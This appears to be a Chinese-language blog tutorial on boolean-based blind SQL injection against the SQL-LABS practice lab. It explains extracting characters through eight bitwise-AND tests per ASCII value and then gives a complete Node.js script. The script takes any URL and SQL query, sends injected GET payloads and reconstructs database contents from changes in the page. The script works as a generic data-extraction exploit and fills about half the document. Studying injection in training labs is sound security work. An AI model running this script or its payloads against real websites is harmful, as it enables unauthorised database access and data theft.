SQL-LABS GET型布尔盲注脚本(node)

原理

基于SQL-LABS LESS-5,LESS-8 GET型布尔注入,（布尔盲注详解),，基于MSQL 布尔盲注，主要是判断ascii码值是否与猜测的值相同，通过判断页面变化，确定ascii值

由于0-z的ascii值是48-122，256 = 2 ^ 0 + 2 ^ 1 + 2 ^ 2 + 2 ^ 3 + 2 ^ 4 +2 ^ 5 + 2 ^ 6 + 2^ 7
，通过按位与运算8次，结果相加得到相应的ascii值，进而得到对应的字符

115 -> 01110011
2^0 -> 00000001 = 1    115 & 2^0 = 1
2^1 -> 00000010 = 2    115 & 2^1 = 2
2^2 -> 00000100 = 4    115 & 2^2 = 0
2^3 -> 00001000 = 8    115 & 2^3 = 0
2^4 -> 00010000 = 16   115 & 2^4 = 16
2^5 -> 00100000 = 32   115 & 2^5 = 32
2^6 -> 01000000 = 64   115 & 2^6 = 64
2^7 -> 10000000 = 128  115 & 2^7 = 0
ascii(s) = 115 = 1+2+16+32+64 = 115 = 's'

通过此特性，构造Get请求，循环url，得到ascii码值，一个ascii码值需要执行8次按位与，只需要判断页面的变化，记录按位与得到的值，最后相加并转换得到一个字符，当转换的ascii码 = 0的时候，表示没有字符了，即可退出循环，并打印该字符

代码

const axios = require('axios')
const readline = require('readline')
const rl = readline.createInterface({
  input: process.stdin,
  output: process.stdout
})
async function inject(url) {
  console.log('[+] paylod:' + url)
  let res = await axios.get(url)
  const regex = /You are in/
  if (regex.test(res.data)) {
    return parseInt(url.match(/\d+\--+/)[0].replace(/\D+/, ''))
  } else {
    return 0
  }
}
async function main() {
  console.log('[+]Please enter Url')
  let url = await new Promise((reslove, reject) => {
    rl.on('line', line => {
      reslove(line)
    })
  })
  console.log('[+]Please enter SQL')
  let sql = await new Promise((reslove, reject) => {
    rl.on('line', line => {
      reslove(line)
      rl.close()
    })
  })
  let result = ''
  let index = 1
  let flag = true
  while (flag) {
    let sumAscii = 0
    for (i = 0; i < 8; i++) {
      let str = url + `?id=1' and ascii(substr((${sql}),${index},1)) %26 ${Math.pow(2, i)} = ${Math.pow(2, i)}--+`
      sumAscii += await inject(str)
    }
    if (sumAscii === 0) {
      flag = false
    } else {
      result += String.fromCharCode(sumAscii)
      ++index
    }
  }
  console.log('\n[+]Inject_Result:' + sql + ' = ' + result)
}
main()

结果

• 爆库

• 爆表